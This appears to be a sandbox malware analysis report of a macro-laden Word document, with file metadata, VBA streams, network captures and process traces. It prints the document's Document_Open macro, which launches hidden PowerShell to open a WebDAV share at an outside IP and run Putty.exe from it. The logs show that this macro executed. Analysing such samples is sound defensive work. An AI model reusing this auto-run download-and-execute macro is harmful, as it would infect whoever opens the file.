                    SHA512:f7ff78e68a825e496ae1ca920951ebcdcba88a70dc33e36da686e0b2536681b8c6f8ef46caf29a53a5ca83563d34e4ceebefbcea7df001eaee41fc2fa58ac460
                    SSDEEP:192:HNmtebfbsyAAgT3FNQtwVNMZ9zvu/hM2ce5eO23S7Ok0Z/EYaEbLHRf18iNXDMr0:tmtebFgr7XfMDu/y2chC78qazRuijB3T
                    TLSH:2C72BF3FDA00B454C67786BA84AA86F2F6564431870876EF2506E6CD52241D30BE7FCE
                    File Content Preview:PK..........!.|..|............[Content_Types].xml ...(.........................................................................................................................................................................................................
                    Icon Hash:2764a3aaaeb7bdbf
                    Document Type:OpenXML
                    Number of OLE Files:1
                    Has Summary Info:
                    Application Name:
                    Encrypted Document:False
                    Contains Word Document Stream:True
                    Contains Workbook/Book Stream:False
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:False
                    Flash Objects Count:0
                    Contains VBA Macros:True
                    Title:
                    Subject:
                    Author:admin
                    Keywords:
                    Template:fwd.dotm
                    Last Saved By:admin
Revision Number:4
                    Total Edit Time:0
                    Create Time:2024-03-26T12:23:00Z
                    Last Saved Time:2024-03-26T21:28:00Z
                    Number of Pages:1
                    Number of Words:0
                    Number of Characters:0
                    Creating Application:Microsoft Office Word
                    Security:0
                    Number of Lines:0
                    Number of Paragraphs:0
                    Thumbnail Scaling Desired:false
                    Company:
                    Contains Dirty Links:false
                    Shared Document:false
                    Changed Hyperlinks:false
                    Application Version:16.0000
                    General
                    Stream Path:VBA/NewMacros
                    VBA File Name:NewMacros.bas
                    Stream Size:961
                    Data ASCII:. . . . . . . . z . . . . . . . . . . . . i . . . . . . . . . . . , : " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 69 03 00 00 00 00 00 00 01 00 00 00 a8 2c 3a 22 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "NewMacros"
                    Sub fwfashj()
                    '
                    ' fwfashj Macro
                    '
                    '
                    
                    End Sub
                    

                    General
                    Stream Path:VBA/ThisDocument
                    VBA File Name:ThisDocument.cls
                    Stream Size:2096
                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . , c . . # . . . . . . . . . . . . . . . . . p . . . n T . X E I . " . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . ( 9 . O . k . . . . . . . . . . . . . . . . . . . . . . . x . . . . ( 9 . O . k . n T . X E I . " . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . 6 " . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 9 . 0 . 6 . - . 0 . 0 . 0 . 0 . - . 0 . 0
                    Data Raw:01 16 03 00 03 00 01 00 00 e2 03 00 00 e4 00 00 00 10 02 00 00 10 04 00 00 1e 04 00 00 52 06 00 00 00 00 00 00 01 00 00 00 a8 2c 63 d2 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 6e 54 d3 87 9b b5 58 45 9d f7 49 f3 1b 22 dd d1 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Attribute VB_Name = "ThisDocument"
                    Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True
                    Sub Document_Open()
                        Dim objShell As Object
                        Dim strCommand As String
                        
                        
                        Set objShell = CreateObject("WScript.Shell")
                        
                        
                        strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
                        
                        
                        objShell.Run strCommand, 1, True
                        
                       
                        Set objShell = Nothing
                    End Sub
                    
                    
                    

                    General
                    Stream Path:PROJECT
                    CLSID:
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:420
                    Entropy:5.37577115575786
                    Base64 Encoded:True
                    Data ASCII:I D = " { E 1 7 0 0 2 5 E - A A D B - 4 A A 0 - B D A B - 2 8 2 5 2 B 3 7 B A 0 9 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = N e w M a c r o s . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D C D E 2 B 0 9 D B E 1 D F E 1 D F E 1 D F E 1 D F " . . D P B = " B 8 B A 4 F B 0 5 0 B 0 5 0 B 0 " . . G C = " 9 4 9 6 6 3 5 1 E 3 2 C E 4 2 C E 4 D 3 " . . . . [ H o s
                    Data Raw:49 44 3d 22 7b 45 31 37 30 30 32 35 45 2d 41 41 44 42 2d 34 41 41 30 2d 42 44 41 42 2d 32 38 32 35 32 42 33 37 42 41 30 39 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4e 65 77 4d 61 63 72 6f 73 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22
                    General
                    Stream Path:PROJECTwm
                    CLSID:
                    File Type:data
                    Stream Size:71
                    Entropy:3.3485999524807437
                    Base64 Encoded:False
                    Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . N e w M a c r o s . N . e . w . M . a . c . r . o . s . . . . .
                    Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 4e 65 77 4d 61 63 72 6f 73 00 4e 00 65 00 77 00 4d 00 61 00 63 00 72 00 6f 00 73 00 00 00 00 00
                    General
                    Stream Path:VBA/_VBA_PROJECT
                    CLSID:
                    File Type:data
                    Stream Size:2472
                    Entropy:3.970498286675828
                    Base64 Encoded:False
                    Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
                    Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                    General
                    Stream Path:VBA/__SRP_0
                    CLSID:
                    File Type:data
                    Stream Size:1589
                    Entropy:3.4573811374928995
                    Base64 Encoded:False
                    Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . H a N . f ( d + x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 0a 00 00 00 00 00 00 7e 02 00 00 00
                    General
                    Stream Path:VBA/__SRP_1
                    CLSID:
                    File Type:data
                    Stream Size:182
                    Entropy:1.6862905000266526
                    Base64 Encoded:False
                    Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                    Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                    General
                    Stream Path:VBA/__SRP_2
                    CLSID:
                    File Type:data
                    Stream Size:448
                    Entropy:2.093463369058467
                    Base64 Encoded:False
                    Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . ` . . . A . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . .
                    Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 91 07 00 00 00 00 00 00 00 00 00 00 c1 07 00 00 00 00 00 00 00 00 00 00 11 08
                    General
                    Stream Path:VBA/__SRP_3
                    CLSID:
                    File Type:data
                    Stream Size:156
                    Entropy:1.7820663630707385
                    Base64 Encoded:False
                    Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                    Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 e1 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                    General
                    Stream Path:VBA/dir
                    CLSID:
                    File Type:data
                    Stream Size:527
                    Entropy:6.260273730296486
                    Base64 Encoded:True
                    Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . . h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . E O f f i c E O . f . i . c E . . . E 2 D F . 8 D 0 4 C - 5 B . F A - 1 0 1 B - B D E 5 E A A C . 4 . 2 E g
                    Data Raw:01 0b b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 17 ef 10 68 0c 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                    Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                    Oct 23, 2024 17:30:52.048788071 CEST  49163        80         192.168.2.22  89.23.98.98
                    Oct 23, 2024 17:30:52.054563999 CEST  80           49163      89.23.98.98   192.168.2.22
                    Oct 23, 2024 17:30:52.054683924 CEST  49163        80         192.168.2.22  89.23.98.98
                    Oct 23, 2024 17:30:52.055025101 CEST  49163        80         192.168.2.22  89.23.98.98
                    Oct 23, 2024 17:30:52.060640097 CEST  80           49163      89.23.98.98   192.168.2.22
                    Oct 23, 2024 17:30:52.196660042 CEST  49163        80         192.168.2.22  89.23.98.98
                    Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                    0           192.168.2.22  49163        89.23.98.98     80                3616  C:\Windows\explorer.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Oct 23, 2024 17:30:52.055025101 CEST  100                OUT        OPTIONS / HTTP/1.1
                    Connection: Keep-Alive
                    User-Agent: DavClnt
                    translate: f
                    Host: 89.23.98.98



                    Target ID:0
                    Start time:11:30:43
                    Start date:23/10/2024
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f9a0000
                    File size:1'423'704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:11:30:45
                    Start date:23/10/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"
                    Imagebase:0x13f380000
                    File size:443'392 bytes
                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:4
                    Start time:11:30:48
                    Start date:23/10/2024
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\explorer.exe" \\89.23.98.98@80\file\
                    Imagebase:0xff2f0000
                    File size:3'229'696 bytes
                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:5
                    Start time:11:30:51
                    Start date:23/10/2024
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:explorer.exe
                    Imagebase:0xff2f0000
                    File size:3'229'696 bytes
                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Call Graph

                    Legend: Entrypoint, Decryption Function, Executed, Not Executed
                    callgraph 2 fwfashj 12 Document_Open Run:1,CreateObject:1

                    Module: NewMacros

                    Declaration
                    Line  Content
                    1     Attribute VB_Name = "NewMacros"

                    Line  Instruction    Meta Information
                    2     Sub fwfashj()
                    8     End Sub

                    Module: ThisDocument

                    Declaration
                    Line  Content
                    1     Attribute VB_Name = "ThisDocument"
                    2     Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
                    3     Attribute VB_GlobalNameSpace = False
                    4     Attribute VB_Creatable = False
                    5     Attribute VB_PredeclaredId = True
                    6     Attribute VB_Exposed = True
                    7     Attribute VB_TemplateDerived = False
                    8     Attribute VB_Customizable = True

                    APIs          Meta Information
                    CreateObject  CreateObject("WScript.Shell")
                    Run           IWshShell3.Run("powershell.exe -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"",1,True) -> 1

                    Strings  Decrypted Strings
                    "WScript.Shell"
                    "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""

                    Line  Instruction                                   Meta Information
                    9     Sub Document_Open()
                    10    Dim objShell as Object
                          executed
                    11    Dim strCommand as String
                    14    Set objShell = CreateObject("WScript.Shell")  CreateObject("WScript.Shell")
                          executed
                    17    strCommand = "powershell.exe -WindowStyle Hidden -c ""explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"""
                    20    objShell.Run strCommand, 1, True
                          IWshShell3.Run("powershell.exe -WindowStyle Hidden -c "explorer '\\89.23.98.98@80\file\'; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89.23.98.98@80\file\Putty.exe"",1,True) -> 1
                          executed
                    23    Set objShell = Nothing
                    24    End Sub

                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.393910031.000007FE89DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89DD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7fe89dd0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: 0cD
                      • API String ID: 0-191860258
                      • Opcode ID: 4507c2df1d503313e302b95947f3bb1155a62c78699836ec65d4f17ee0056180
                      • Instruction ID: d02d79954762f7b48b7361316419c527af6951c7d897884f8c32a2203f152bdf
                      • Opcode Fuzzy Hash: 4507c2df1d503313e302b95947f3bb1155a62c78699836ec65d4f17ee0056180
                      • Instruction Fuzzy Hash: E4D1183090E7C91FE757972858146A97FA4EF97360F0901EBD48DCB1E3D618AC1AC3A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.393910031.000007FE89DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89DD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7fe89dd0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xh$`k?$h.B$h.B
                      • API String ID: 0-2620180523
                      • Opcode ID: 142292e01dbeed142f010f5afec9e424fb2c2f898741e0f6decfc73fb7a7579c
                      • Instruction ID: b0003a2858bb10165a99ca1475cc2e8aaf6326c12edf17f2cb7d7c626179613a
                      • Opcode Fuzzy Hash: 142292e01dbeed142f010f5afec9e424fb2c2f898741e0f6decfc73fb7a7579c
                      • Instruction Fuzzy Hash: E481F42150E7C60FE75397B858246A67FF1DF47214B1E01EBC48ACB1E3CA19AC5AC362
                      Strings
                      Memory Dump Source
                      • Source File: 00000002.00000002.393910031.000007FE89DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89DD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_2_2_7fe89dd0000_powershell.jbxd
                      Similarity
                      • API ID:
                      • String ID: Xh$h.B$h.B$h.B$h.B$h.B$h.B
                      • API String ID: 0-1704855422
                      • Opcode ID: 91fded6d4e0974fe327f10ae78e4bf8a3d83b11d6cc0d23dd492b5be8d5cab7b
                      • Instruction ID: 96035d62d7950dd6f7a871df1ce6a8c882019bd5b9058bf236db57adb0ee5e92
                      • Opcode Fuzzy Hash: 91fded6d4e0974fe327f10ae78e4bf8a3d83b11d6cc0d23dd492b5be8d5cab7b
                      • Instruction Fuzzy Hash: 00510722A0DA864FFB47A72C64103797FA2EF96348F2901E7D04ED71E3DA19AC15C355